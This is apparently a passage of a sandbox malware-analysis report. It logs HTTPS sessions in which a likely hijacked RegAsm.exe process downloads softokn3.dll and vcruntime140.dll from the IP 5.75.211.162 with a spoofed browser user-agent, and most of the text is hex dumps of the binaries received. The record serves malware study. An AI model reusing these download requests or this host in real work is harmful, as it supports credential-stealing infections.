2024-09-26 22:14:48 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 22:14:48 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:49 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:49 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:49 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:49 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:49 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 22:14:49 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49755	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:50 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:51 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:50 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:50 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:51 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 22:14:52 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-26 22:14:52 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 22:14:52 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-26 22:14:52 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49756	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
